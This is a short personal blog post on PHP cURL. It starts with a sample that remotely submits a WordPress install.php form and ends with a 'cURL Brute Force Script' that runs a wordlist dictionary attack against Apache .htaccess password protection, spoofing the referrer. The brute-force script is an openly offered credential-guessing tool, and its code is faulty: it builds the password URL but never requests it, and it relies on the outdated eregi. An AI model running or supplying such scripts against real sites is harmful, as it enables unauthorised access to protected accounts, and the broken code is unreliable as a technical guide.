twitter
    Find out what I'm doing, Follow Me :)
If you have any question, suggestion or article topic for me to write, feel free to contact me through my shout box. ;) Some time I need an idea to write. hehe Hopefully I can help you and share my expertise.

php curlhow to post using curl

curl is a command line tool for transferring files with URL syntax. cURL supporting a large internet protocol such as HTTP POST, HTTP PUT, FTP etc.

libcurl is a free and easy-to-use client-side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS and FILE. libcurl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, Kerberos4), file transfer resume, http proxy tunneling and more!

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols.


How to submit form post using cUrl?


Submit form post using cUrl is pretty simple.

$url = 'http://mydomain.com/';
$postdata = "Submit=Install%20WordPress&admin_email=" . $wp_admin_email . "&blog_public=1&weblog_title=" . $wp_title;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url . "wp-admin/install.php?step=2");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt ($ch, CURLOPT_REFERER, $url . "wp-admin/install.php");
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt ($ch, CURLOPT_POST, 1);
$result = curl_exec ($ch);
curl_close($ch);


I create this sample code to sent a post into wordpress install.php without open that page manually. It's mean I can sent a form post from outside of the target domain and display the result from my execute code.

Others thing that cUrl can do?


cURL Brute Force Script

The following cURL script can be used to brute force Apache .htaccess authentication:
$url = "http://www.example.com/admin/";    // Set the URL to be bruteforced
$ref = "http://www.example.com/index.php"; // Set the referrer to spoof
$denied = "Forbidden"; // Set the "Denied" output
$wordlist = "/var/www/wordlist.txt"; // Set the wordlist location
set_time_limit( 0 ); // Set script execution limit. 0 = no limit

$ch = curl_init( ); // Initialise cURL
curl_setopt( $ch, CURLOPT_URL, $url ); // Set URL as $url
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,1 ); // Set RETURNTRANSFER to TRUE
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION,1 ); // Set FOLLOWLOCATION to TRUE

foreach( file( $wordlist ) as $password ) // Start the loop for dictionary attack
{
$force = "http://admin:{$password}@www.example.com/admin/"; // Set the URL to attack,
curl_setopt( $ch, CURLOPT_URL, $url ); // Load the URL to attack with cURL
$check = curl_exec( $ch ); // Set params to check
if( !eregi( $denied, $check ) ) // Check to see if $denied is not in page
{
die( "Success! The password is: {$password}" ); // If $denied returns false, success
}
}
curl_close( $ch ); // Close the cURL process

0 comments:

Post a Comment